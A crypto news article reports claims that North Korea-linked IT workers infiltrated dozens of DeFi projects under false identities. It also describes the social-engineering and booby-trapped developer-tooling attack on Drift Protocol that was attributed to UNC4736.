North Korea‑connected operatives have spent years quietly embedding themselves inside crypto companies and DeFi projects.
A Long-Standing Crypto-Infiltration SagaNews and reports from the Democratic People’s Republic of Korea tend to have a particular conspiracy theory-action movie feel to them. However, they also have the tendency to be true and not over exaggerated at all.
This time, security researcher and MetaMask developer Taylor Monahan said on a Sunday post on the social network X that these methods date back to DeFi’s formative years, with actors linked to the DPRK quietly contributing to several major, widely used protocols.
Yuppppppp
Lots of DPRK IT Workers built the protocols you know and love, all the way back to defi summer
She claims that North Korean IT workers have quietly worked inside more than 40 DeFi projects over roughly seven years, including protocols that became household names after DeFi summer.
oh god uhhhh like sushi, thorchain, yam, pickle, harvest, reclaim, swing, paid, naos, shezmu, qrolli, saffron, sifu, napier, harmony, blueberry, stabble, onering, elemental, divvy, la token, impermax, kira, cook, fantom, ankr, gamerse, metaplay, spice, beanstalk, deltaprime,…
These workers often have “real” on‑chain experience (seven years of blockchain dev) but operate under stolen or synthetic identities, plugging into teams via normal hiring funnels
Her posts reply to tim, a pseudonymous builder and public face of Titan, a Solana‑based DEX aggregator and routing project, claiming that for a previous job they interviewed an extremely qualified candidate that turned out to be a Lazarus operative, the North-Korea affiliated group that has funneled billions of dollars in stolen money through cryptocurrency networks.
at a previous job, we interviewed someone who turned out to be a Lazarus operative. he did video calls and was extremely qualified
we invited him for in person interviews and he ultimately declined to fly out, so we passed
Renowned crypto detective ZachXBT also replied to tim’s post, explaining that this is not just “Lazarus” but a network of DPRK units (Lazarus, APT38, AppleJeus, etc.) coordinated by the Reconnaissance General Bureau and optimized for financial cybercrime. Their methods are based on “basic, relentless” outreach via LinkedIn, job boards, interviews, Zoom, plus remote dev roles that teams still grant far too easily.
Lazarus Group is the collective name for all DPRK state sponsored cyber actors.
The main issue is everyone groups them all together when the complexity of threats are different.
New Information On The Crypto-Hack On Drift ProtocolThey attributed the attack “with medium confidence” to UNC4736, a North Korea–aligned, state‑sponsored hacking group.
The protocol claimed the attackers relied on a well elaborated social engineering strategy: fake professional personas, in‑person conference interactions, and booby‑trapped developer tooling to compromise contributors before finally executing the exploit. The attackers posed as a legitimate trading firm, met Drift contributors in person across several countries and used fully constructed identities with work histories and professional networks before triggering the exploit
The attackers weaponized common developer tooling by slipping malicious tasks into VS Code and Cursor configurations, delivering a compromised repository that contributors ran locally without realizing it. All these combined make the incident far more like an insider‑style supply‑chain compromise than a straightforward smart contract.
Market ImplicationsThis saga crypto-hacking has turned into structural national‑security risk. Regulators and sanctions bodies are already tightening around DPRK IT networks, and more aggressive enforcement is likely to follow.
Large, state‑linked exploits create latent protocol risk: higher insurance premia, potential delistings, governance infighting over restitution, and longer risk‑off periods for DeFi tokens and perp volumes.
Cover image from Perplexity. BTCUSDT chart from Tradingview.
